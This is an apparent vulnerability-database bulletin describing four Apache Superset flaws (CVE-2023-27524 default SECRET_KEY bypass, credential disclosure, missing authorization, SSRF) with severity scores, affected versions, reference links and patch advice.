Multiple vulnerabilities in Apache Superset
| Risk | High |
| Patch available | YES |
| Number of vulnerabilities | 4 |
| CVE-ID | CVE-2023-27524 CVE-2023-30776 CVE-2023-27525 CVE-2023-25504 |
| CWE-ID | CWE-1188 CWE-200 CWE-862 CWE-918 |
| Exploitation vector | Network |
| Public exploit | Vulnerability #1 is being exploited in the wild. |
| Vulnerable software |
Apache Superset Web applications / Other software |
| Vendor | Apache Foundation |
Security Bulletin
This security bulletin contains information about 4 vulnerabilities.
1) Insecure default initialization of resource
EUVDB-ID: #VU85166
Risk: High
CVSSv4.0: 9.3 [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/U:Amber]
CVE-ID: CVE-2023-27524
CWE-ID:
CWE-1188 - Insecure Default Initialization of Resource
Exploit availability: Yes
DescriptionThe vulnerability allows a remote attacker to gain unauthorized access to the application.
The vulnerability exists due to the application does not alter the default configured SECRET_KEY by itself. A remote attacker can authenticate and access unauthorized resources if the software installation was not performed according to vendor's instructions.
Install updates from vendor's website.
Vulnerable software versionsApache Superset: 2.0.0 - 2.0.1
CPE2.3 External linkshttps://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk
https://www.openwall.com/lists/oss-security/2023/04/24/2
https://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html
https://packetstormsecurity.com/files/175094/Apache-Superset-2.0.0-Remote-Code-Execution.html
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.
Is there known malware, which exploits this vulnerability?
Yes. This vulnerability is being exploited in the wild.
2) Information disclosure
EUVDB-ID: #VU85965
Risk: Low
CVSSv4.0: 1.3 [CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear]
CVE-ID: CVE-2023-30776
CWE-ID:
CWE-200 - Information exposure
Exploit availability: No
DescriptionThe vulnerability allows a remote user to gain access to potentially sensitive information.
The vulnerability exists due to excessive data output by the application. A remote user with specific data permissions could access database connections stored passwords by requesting a specific REST API.
MitigationInstall updates from vendor's website.
Vulnerable software versionsApache Superset: 1.3.0 - 2.0.1
CPE2.3- cpe:2.3:a:apache_foundation:apache_superset:1.5.3:*:*:*:*:*:*:*
- cpe:2.3:a:apache_foundation:apache_superset:2.0.1:*:*:*:*:*:*:*
https://lists.apache.org/thread/s9w9w10mt2sngk3solwnmq5k7md53tsz
https://www.openwall.com/lists/oss-security/2023/04/24/3
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
3) Missing Authorization
EUVDB-ID: #VU85964
Risk: Low
CVSSv4.0: 1.3 [CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear]
CVE-ID: CVE-2023-27525
CWE-ID:
CWE-862 - Missing Authorization
Exploit availability: No
DescriptionThe vulnerability allows a remote user to gain access to sensitive information.
The vulnerability exists due to missing authorization for non-trivial methods. A remote user with Gamma role can access metadata information.
Install updates from vendor's website.
Vulnerable software versionsApache Superset: 2.0.0 - 2.0.1
CPE2.3 External linkshttps://lists.apache.org/thread/wpv7b17zjg2pmvpfkdd6nn8sco8y2q77
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
4) Server-Side Request Forgery (SSRF)
EUVDB-ID: #VU85963
Risk: Medium
CVSSv4.0: 1.3 [CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:U/U:Green]
CVE-ID: CVE-2023-25504
CWE-ID:
CWE-918 - Server-Side Request Forgery (SSRF)
Exploit availability: No
DescriptionThe disclosed vulnerability allows a remote user to perform SSRF attacks.
The vulnerability exists due to insufficient validation of user-supplied input within the import dataset feature. A remote user can send a specially crafted HTTP request and trick the application to initiate requests to arbitrary systems.
Successful exploitation of this vulnerability may allow a remote attacker gain access to sensitive data, located in the local network or send malicious requests to other servers from the vulnerable system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsApache Superset: 2.0.0 - 2.0.1
CPE2.3 External linkshttps://lists.apache.org/thread/tdnzkocfsqg2sbbornnp9g492fn4zhtx
https://www.openwall.com/lists/oss-security/2023/04/18/8
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
